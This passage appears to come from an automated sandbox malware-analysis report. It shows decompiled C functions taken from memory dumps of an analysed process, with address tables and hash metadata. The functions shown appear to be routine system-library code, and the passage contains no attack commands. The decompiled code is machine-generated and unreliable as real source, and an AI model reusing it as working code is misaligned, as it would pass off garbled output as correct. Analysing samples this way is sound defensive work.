						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                                                                                0x04f14bad
                                                                                                                                0x04f14bbf
                                                                                                                                0x04f14bc2
                                                                                                                                0x04f14bc6
                                                                                                                                0x04f14bcd
                                                                                                                                0x04f14bd9
                                                                                                                                0x04f567fe
                                                                                                                                0x04f56800
                                                                                                                                0x04f14ccc
                                                                                                                                0x04f14ccd
                                                                                                                                0x04f14cb7
                                                                                                                                0x04f14cc9
                                                                                                                                0x04f14cc9
                                                                                                                                0x04f14bdf
                                                                                                                                0x04f14be5
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f14beb
                                                                                                                                0x04f14bef
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f14bf5
                                                                                                                                0x04f14bf9
                                                                                                                                0x04f14c06
                                                                                                                                0x04f14c0b
                                                                                                                                0x04f14c17
                                                                                                                                0x04f14c1c
                                                                                                                                0x04f14c1f
                                                                                                                                0x04f14c25
                                                                                                                                0x04f14c33
                                                                                                                                0x04f14c3d
                                                                                                                                0x04f14c40
                                                                                                                                0x04f14c43
                                                                                                                                0x04f14c47
                                                                                                                                0x04f14c4d
                                                                                                                                0x04f14c53
                                                                                                                                0x04f14c54
                                                                                                                                0x04f14c55
                                                                                                                                0x04f14c56
                                                                                                                                0x04f14c5b
                                                                                                                                0x04f14c5c
                                                                                                                                0x04f14c63
                                                                                                                                0x04f14c6b
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f56776
                                                                                                                                0x04f56784
                                                                                                                                0x04f56784
                                                                                                                                0x04f5679f
                                                                                                                                0x04f567a7
                                                                                                                                0x04f567af
                                                                                                                                0x04f567ce
                                                                                                                                0x00000000
                                                                                                                                0x04f567b1
                                                                                                                                0x04f567b7
                                                                                                                                0x04f567b8
                                                                                                                                0x04f567c1
                                                                                                                                0x04f567d3
                                                                                                                                0x04f567d9
                                                                                                                                0x04f567dd
                                                                                                                                0x04f14c94
                                                                                                                                0x04f14c94
                                                                                                                                0x04f14c98
                                                                                                                                0x04f14c9c
                                                                                                                                0x04f14ca3
                                                                                                                                0x04f567f4
                                                                                                                                0x04f567f4
                                                                                                                                0x04f14cb5
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f14cb5
                                                                                                                                0x04f14c79
                                                                                                                                0x04f14c7e
                                                                                                                                0x04f14c89
                                                                                                                                0x04f14c8b
                                                                                                                                0x04f14c8f
                                                                                                                                0x04f14c8f
                                                                                                                                0x00000000
                                                                                                                                0x04f14c89
                                                                                                                                0x04f567c3
                                                                                                                                0x00000000
                                                                                                                                0x04f567c3
                                                                                                                                0x04f567af
                                                                                                                                0x04f14c73
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9602c3c5a3c19e5e88e5eee11c7483451fea933d35458a3e2419307bee026740
                                                                                                                                • Instruction ID: a8195baeb8c8022a080d89ea81bcd7ad053083e7a8be9502cf71d6ab7705a0f6
                                                                                                                                • Opcode Fuzzy Hash: 9602c3c5a3c19e5e88e5eee11c7483451fea933d35458a3e2419307bee026740
                                                                                                                                • Instruction Fuzzy Hash: 9A41A436E002689BEB21DF64DD40BEAB7B4EF45740F4101A5E908EB250DB74BE86CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EF8A0A, Relevance: .1, Instructions: 120COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 94%
                                                                                                                                			E04EF8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x4fdd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E04F2B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E04EFE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4ec1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04F11DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04F23C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04EF8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                                                                                0x04ef8a0a
                                                                                                                                0x04ef8a1c
                                                                                                                                0x04ef8a23
                                                                                                                                0x04ef8a2e
                                                                                                                                0x04ef8a30
                                                                                                                                0x04ef8a36
                                                                                                                                0x04ef8a3c
                                                                                                                                0x04ef8a3e
                                                                                                                                0x04ef8a4a
                                                                                                                                0x04ef8a52
                                                                                                                                0x04ef8a9c
                                                                                                                                0x04ef8aae
                                                                                                                                0x04ef8a58
                                                                                                                                0x04ef8a5e
                                                                                                                                0x04ef8a6a
                                                                                                                                0x04ef8a6f
                                                                                                                                0x04ef8a75
                                                                                                                                0x04ef8a7d
                                                                                                                                0x04ef8a85
                                                                                                                                0x04ef8a86
                                                                                                                                0x04ef8a89
                                                                                                                                0x04ef8a93
                                                                                                                                0x04ef8a99
                                                                                                                                0x04ef8a9b
                                                                                                                                0x00000000
                                                                                                                                0x04ef8aaf
                                                                                                                                0x04ef8abe
                                                                                                                                0x04ef8ac3
                                                                                                                                0x04ef8acb
                                                                                                                                0x04ef8ad7
                                                                                                                                0x04ef8ae0
                                                                                                                                0x04ef8af1
                                                                                                                                0x00000000
                                                                                                                                0x04ef8af1
                                                                                                                                0x04ef8acd
                                                                                                                                0x04ef8ad5
                                                                                                                                0x04ef8afb
                                                                                                                                0x04ef8afd
                                                                                                                                0x04ef8aff
                                                                                                                                0x04ef8b07
                                                                                                                                0x04ef8b22
                                                                                                                                0x04ef8b24
                                                                                                                                0x04ef8b2a
                                                                                                                                0x04ef8b2e
                                                                                                                                0x04ef8b3f
                                                                                                                                0x04ef8b78
                                                                                                                                0x04ef8b41
                                                                                                                                0x04ef8b52
                                                                                                                                0x04ef8b54
                                                                                                                                0x04ef8b5c
                                                                                                                                0x04ef8b74
                                                                                                                                0x04ef8b74
                                                                                                                                0x04ef8b5c
                                                                                                                                0x04ef8b3f
                                                                                                                                0x04ef8b5e
                                                                                                                                0x04ef8b61
                                                                                                                                0x04ef8b64
                                                                                                                                0x04ef8b64
                                                                                                                                0x04ef8b6c
                                                                                                                                0x04ef8b6c
                                                                                                                                0x04ef8b11
                                                                                                                                0x04f49cd5
                                                                                                                                0x04f49cd5
                                                                                                                                0x04ef8b17
                                                                                                                                0x04ef8b1a
                                                                                                                                0x04ef8b1a
                                                                                                                                0x00000000
                                                                                                                                0x04ef8ad5
                                                                                                                                0x04ef8a89

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a4df4c0d0ab69835bf6156851c08d03b675bc8606a3921935daefc2df29b81db
                                                                                                                                • Instruction ID: 199f59dd4752a6d505a03deb8f465aaf821b717fbadc72d4e7e981bd655937b1
                                                                                                                                • Opcode Fuzzy Hash: a4df4c0d0ab69835bf6156851c08d03b675bc8606a3921935daefc2df29b81db
                                                                                                                                • Instruction Fuzzy Hash: 444173B5A4022C9BDB64EF15CC88AE9B7F4FF44304F1055EADA1997251E770AE80CF50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F669A6, Relevance: .1, Instructions: 108COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 69%
                                                                                                                                			E04F669A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x4fdd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L04EF6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04F66BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04F29980() >= 0) {
							E04F02280(_t56, 0x4fd8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x4fd8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x4fd8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E04EEB6F0(0x4ecc338, 0x4ecc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04F29520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E04F295D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E04EFFFB0(_t68, _t77, 0x4fd8778);
				}
				_pop(_t78);
				return E04F2B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                                                                0x04f669b5
                                                                                                                                0x04f669be
                                                                                                                                0x04f669c3
                                                                                                                                0x04f669c9
                                                                                                                                0x04f669cc
                                                                                                                                0x04f669d1
                                                                                                                                0x04f669d3
                                                                                                                                0x04f669de
                                                                                                                                0x04f669e1
                                                                                                                                0x04f669ea
                                                                                                                                0x04f669f6
                                                                                                                                0x04f669fe
                                                                                                                                0x04f66a13
                                                                                                                                0x04f66a14
                                                                                                                                0x04f66a15
                                                                                                                                0x04f66a16
                                                                                                                                0x04f66a1e
                                                                                                                                0x04f66a26
                                                                                                                                0x04f66a31
                                                                                                                                0x04f66a36
                                                                                                                                0x04f66a37
                                                                                                                                0x04f66a40
                                                                                                                                0x04f66a49
                                                                                                                                0x04f66a4a
                                                                                                                                0x04f66a53
                                                                                                                                0x04f66a59
                                                                                                                                0x04f66a5d
                                                                                                                                0x04f66a5e
                                                                                                                                0x04f66a64
                                                                                                                                0x04f66a67
                                                                                                                                0x04f66a6a
                                                                                                                                0x04f66a6d
                                                                                                                                0x04f66a70
                                                                                                                                0x04f66a77
                                                                                                                                0x04f66a7d
                                                                                                                                0x04f66a86
                                                                                                                                0x04f66a89
                                                                                                                                0x04f66a9c
                                                                                                                                0x04f66a9f
                                                                                                                                0x04f66aa2
                                                                                                                                0x04f66aa5
                                                                                                                                0x04f66aaf
                                                                                                                                0x04f66ab1
                                                                                                                                0x04f66ab8
                                                                                                                                0x04f66ab9
                                                                                                                                0x04f66abb
                                                                                                                                0x04f66abe
                                                                                                                                0x04f66ac5
                                                                                                                                0x04f66ac5
                                                                                                                                0x04f66aaf
                                                                                                                                0x04f66a40
                                                                                                                                0x04f66a26
                                                                                                                                0x04f669fe
                                                                                                                                0x04f66ace
                                                                                                                                0x04f66ad0
                                                                                                                                0x04f66ad3
                                                                                                                                0x04f66ad8
                                                                                                                                0x04f66adf
                                                                                                                                0x04f66adf
                                                                                                                                0x04f66ae8
                                                                                                                                0x04f66aef
                                                                                                                                0x04f66aef
                                                                                                                                0x04f66af9
                                                                                                                                0x04f66b06

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c01462ecd8aed0ebbcf39f1ce3fe24c0fab4bf5db866f06accff8dc6bcb8a39e
                                                                                                                                • Instruction ID: b35beb55bd5bdb7667f6981768d87c3ab92391f36dbe35edc9ab19f38730487c
                                                                                                                                • Opcode Fuzzy Hash: c01462ecd8aed0ebbcf39f1ce3fe24c0fab4bf5db866f06accff8dc6bcb8a39e
                                                                                                                                • Instruction Fuzzy Hash: 59418FB1E01208AFEB24DFA5D940BFEBBF5EF48714F14812AE915E7240DB74A906CB51
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EE5210, Relevance: .1, Instructions: 107COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 85%
                                                                                                                                			E04EE5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E04EE52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04F295D0();
							L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E04EFEB70(_t54, 0x4fd79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E04F295D0();
								L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E04EFEB70(_t54, 0x4fd79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E04F2F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E04EFEB70(_t54, 0x4fd79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04F295D0();
							L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                                                                0x04ee5220
                                                                                                                                0x04ee5224
                                                                                                                                0x04f40d13
                                                                                                                                0x04f40d16
                                                                                                                                0x04f40d19
                                                                                                                                0x04ee522a
                                                                                                                                0x04ee522a
                                                                                                                                0x04ee522d
                                                                                                                                0x04ee522d
                                                                                                                                0x04ee5231
                                                                                                                                0x04ee5235
                                                                                                                                0x04ee5239
                                                                                                                                0x04f40d5c
                                                                                                                                0x04f40d62
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f40d6a
                                                                                                                                0x04f40d7b
                                                                                                                                0x04f40d7f
                                                                                                                                0x04f40d81
                                                                                                                                0x04f40d84
                                                                                                                                0x04f40d95
                                                                                                                                0x04f40d95
                                                                                                                                0x04f40d6c
                                                                                                                                0x04f40d71
                                                                                                                                0x04f40d71
                                                                                                                                0x04f40d9a
                                                                                                                                0x00000000
                                                                                                                                0x04ee524a
                                                                                                                                0x04ee524a
                                                                                                                                0x04ee5250
                                                                                                                                0x04f40d24
                                                                                                                                0x04f40d35
                                                                                                                                0x04f40d39
                                                                                                                                0x04f40d3b
                                                                                                                                0x04f40d3e
                                                                                                                                0x04f40d50
                                                                                                                                0x04f40d50
                                                                                                                                0x04f40d26
                                                                                                                                0x04f40d2b
                                                                                                                                0x04f40d2b
                                                                                                                                0x00000000
                                                                                                                                0x04f40d55
                                                                                                                                0x04ee5256
                                                                                                                                0x04ee525b
                                                                                                                                0x04ee5265
                                                                                                                                0x04f40da7
                                                                                                                                0x04ee526b
                                                                                                                                0x04ee526e
                                                                                                                                0x04ee5272
                                                                                                                                0x04f40db1
                                                                                                                                0x04f40db4
                                                                                                                                0x04f40dc5
                                                                                                                                0x04f40dc5
                                                                                                                                0x04ee5272
                                                                                                                                0x04ee5278
                                                                                                                                0x04ee527e
                                                                                                                                0x04ee528a
                                                                                                                                0x04ee528c
                                                                                                                                0x04ee528d
                                                                                                                                0x00000000
                                                                                                                                0x04ee5280
                                                                                                                                0x04ee5282
                                                                                                                                0x04ee5288
                                                                                                                                0x04ee529f
                                                                                                                                0x04ee5292
                                                                                                                                0x00000000
                                                                                                                                0x04ee5292
                                                                                                                                0x00000000
                                                                                                                                0x04ee5288
                                                                                                                                0x04ee527e

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6fda0e7e956ba7fff3f82cb31be2e22dc35bde62fb10d78c037e2e4f9b45cdc2
                                                                                                                                • Instruction ID: c9d12ea22f22fa268e8580dc71ecdae5b0df7dc430eea27d65815272ef821bd1
                                                                                                                                • Opcode Fuzzy Hash: 6fda0e7e956ba7fff3f82cb31be2e22dc35bde62fb10d78c037e2e4f9b45cdc2
                                                                                                                                • Instruction Fuzzy Hash: 8A311232751611EFD721AF68CC81B767BB5AF80768F104A29E9154B1A1EF60F802CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F23D43, Relevance: .1, Instructions: 106COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F23D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04EF7B60(0, _t61, 0x4ec11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04EF7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04F04620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                                                                0x04f23d4c
                                                                                                                                0x04f23d50
                                                                                                                                0x04f23d55
                                                                                                                                0x04f23d5e
                                                                                                                                0x04f5e79a
                                                                                                                                0x00000000
                                                                                                                                0x04f5e79a
                                                                                                                                0x04f23d68
                                                                                                                                0x04f5e789
                                                                                                                                0x04f23d9d
                                                                                                                                0x04f23da3
                                                                                                                                0x04f23daf
                                                                                                                                0x04f23db5
                                                                                                                                0x04f23dbc
                                                                                                                                0x04f23dc4
                                                                                                                                0x04f23dc9
                                                                                                                                0x04f23dce
                                                                                                                                0x04f5e7ae
                                                                                                                                0x04f5e7ae
                                                                                                                                0x04f23dde
                                                                                                                                0x04f23de2
                                                                                                                                0x04f23de7
                                                                                                                                0x04f23e0d
                                                                                                                                0x04f23e13
                                                                                                                                0x04f23e16
                                                                                                                                0x04f23e1e
                                                                                                                                0x04f23e25
                                                                                                                                0x04f23e28
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f23e2a
                                                                                                                                0x04f23e2f
                                                                                                                                0x04f23e37
                                                                                                                                0x04f23e37
                                                                                                                                0x00000000
                                                                                                                                0x04f23e37
                                                                                                                                0x04f23e31
                                                                                                                                0x00000000
                                                                                                                                0x04f23e31
                                                                                                                                0x04f23e20
                                                                                                                                0x04f23e20
                                                                                                                                0x04f23e35
                                                                                                                                0x00000000
                                                                                                                                0x04f23de9
                                                                                                                                0x04f23de9
                                                                                                                                0x04f23de9
                                                                                                                                0x04f23dee
                                                                                                                                0x04f23dfd
                                                                                                                                0x04f23dff
                                                                                                                                0x04f23e02
                                                                                                                                0x04f23e05
                                                                                                                                0x04f23e05
                                                                                                                                0x00000000
                                                                                                                                0x04f23df0
                                                                                                                                0x04f23de7
                                                                                                                                0x04f5e78f
                                                                                                                                0x04f5e794
                                                                                                                                0x04f23d79
                                                                                                                                0x04f23d84
                                                                                                                                0x04f23d89
                                                                                                                                0x04f23d8e
                                                                                                                                0x00000000
                                                                                                                                0x04f5e7a4
                                                                                                                                0x04f23d96
                                                                                                                                0x04f23d9a
                                                                                                                                0x00000000
                                                                                                                                0x04f23d9a
                                                                                                                                0x00000000
                                                                                                                                0x04f5e794
                                                                                                                                0x04f23d6e
                                                                                                                                0x04f23d73
                                                                                                                                0x00000000
                                                                                                                                0x04f5e7b5
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f54f50ffed1c426d393cdbcdee3e75c263559c4661a72f4900295464a5465c08
                                                                                                                                • Instruction ID: beb01b600c03b7187ebb21f4919d65c4e8b07ed9faa6e67157d1fef52801ef57
                                                                                                                                • Opcode Fuzzy Hash: f54f50ffed1c426d393cdbcdee3e75c263559c4661a72f4900295464a5465c08
                                                                                                                                • Instruction Fuzzy Hash: 8031AFB2B04A29DBC7248F39D941A7ABBB5EF55700705806AED45CB360F638E842D790
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F1A61C, Relevance: .1, Instructions: 106COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 78%
                                                                                                                                			E04F1A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4fc0220);
				E04F3D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x4fd7b9c; // 0x0
				_t55 = L04F04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E04F3D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
